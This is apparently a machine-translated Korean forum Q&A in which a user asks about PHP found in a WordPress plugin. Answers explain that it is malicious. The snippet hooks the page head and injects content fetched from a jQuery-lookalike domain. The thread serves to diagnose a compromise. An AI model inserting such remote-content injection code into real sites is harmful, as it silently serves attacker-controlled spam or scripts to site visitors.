나는 이것을 플러그인에서 발견했다. 무엇을합니까? 위험한가요?

나는 이것을 플러그인에서 발견했다. 무엇을합니까? 위험한가요?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

http://jquery.com/jQuery에서 사용 하는 도메인의 철자가 틀린 도메인에서 스팸을 포함하는 마크 업 블록을로드합니다 (소스를 게시하는 방법에 대해 생각했지만 내용을 광고하고 싶지는 않습니다). 유명하고 인기있는 Javascript 라이브러리이며 WordPress에 Core에 포함되어 있습니다. 실제로는 매우 다른 것을로드 할 때 그 라이브러리를로드하는 것으로 생각됩니다.

그리고 다른 방법으로 jQuery를로드하는 것처럼 보입니다. 변수 이름을 주목하십시오 $jquery.

악의적 인 스크립트를로드하려고 시도 할 수도 있습니다. 나는 확인하지 않았다. 나는 것입니다 해당 페이지의 내용이 언제 컨트롤러가 기분이 도메인을 변경할 수 있습니다 특히 이후 확실히 위험 호출합니다.

스팸이 퍼지는 사이트를 검색 엔진에서 찾아 보면 사이트가 손상 될 수 있습니다.

사용하지 마십시오. 사이트를 운영하는 사람 이외의 다른 웹 사용자 나 귀하에게는 도움이되지 않습니다. 평판이 좋은 사이트에서이 사실을 발견하면 해당 사이트에보고하십시오.

예, 스팸 사이트에서 콘텐츠를로드하는 것은 위험한 코드입니다.

플러그인의 이름은 지정하지 않았지만 웹 사이트에이 코드를 설치 한 후이 코드를 찾았다면 플러그인 코드는 이와 같은 개발자가 아니라 설치 후 해킹되었을 수 있습니다. 이 경우이 플러그인보다 더 많은 웹 사이트에서 악성 코드를 찾을 수 있습니다.

원래 플러그인이있는 곳에서 다운로드 한 플러그인 코드를 확인하고이 악성 코드가 원래 있던지 확인하십시오. 그렇지 않은 경우 사이트가 해킹 된 것입니다. 그러한 경우라고 판단 되면 Codex에서이 기사를 읽으십시오 .